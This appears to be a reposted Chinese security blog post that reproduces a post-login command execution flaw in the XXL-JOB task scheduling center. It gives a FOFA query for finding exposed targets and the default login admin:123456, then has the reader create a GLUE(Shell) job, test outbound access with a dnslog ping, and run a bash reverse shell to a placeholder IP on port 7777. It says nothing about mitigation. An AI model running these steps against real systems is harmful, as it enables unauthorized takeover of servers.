XXL-JOB 任务调度中心 后台任意命令执行漏洞

本文转载于公众号:融云攻防实验室,原文地址:

漏洞复现 XXL-JOB 任务调度中心 后台任意命令执行漏洞

0x01 阅读须知

资源来源于网络,安全小天地只是再次进行分享,使用请遵循本站的免责申明

0x02 漏洞描述

在日常开发中,经常会用定时任务执行某些不紧急又非常重要的事情,例如批量结算,计算当日的订单量,当日的成本收入等。当存在大量定时任务的时候,任务的管理也会成为一个比较头痛的问题。xxl-job,就是一个比较成熟的分布式任务调度平台。XXL-JOB 任务调度中心系统存在后台命令执行漏洞,攻击者可以通过反弹shell执行任意命令,获取服务器管理权限。

图片[1]-XXL-JOB 任务调度中心 后台任意命令执行漏洞-渗透云记 - 专注于网络安全与技术分享

0x03 漏洞复现

fofaapp=”XXL-JOB” || title=”任务调度中心”

1.使用默认口令admin:123456登录

图片[2]-XXL-JOB 任务调度中心 后台任意命令执行漏洞-渗透云记 - 专注于网络安全与技术分享

2.任务管理→新增,配置如下,一定要选择GLUE(Shell)

图片[3]-XXL-JOB 任务调度中心 后台任意命令执行漏洞-渗透云记 - 专注于网络安全与技术分享

3.GLUE IDE查看是否可以出网


#!/bin/bash
ping xx.dnslog.cn
图片[4]-XXL-JOB 任务调度中心 后台任意命令执行漏洞-渗透云记 - 专注于网络安全与技术分享

4.Dnslog服务接收到ping信息即可反弹shell,执行如下脚本,得到一个shell


#!/bin/bash
bash -c 'exec bash -i &>/dev/tcp/x.x.x.x/7777 <&1'

© 版权声明
THE END
喜欢就支持一下吧
点赞10 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容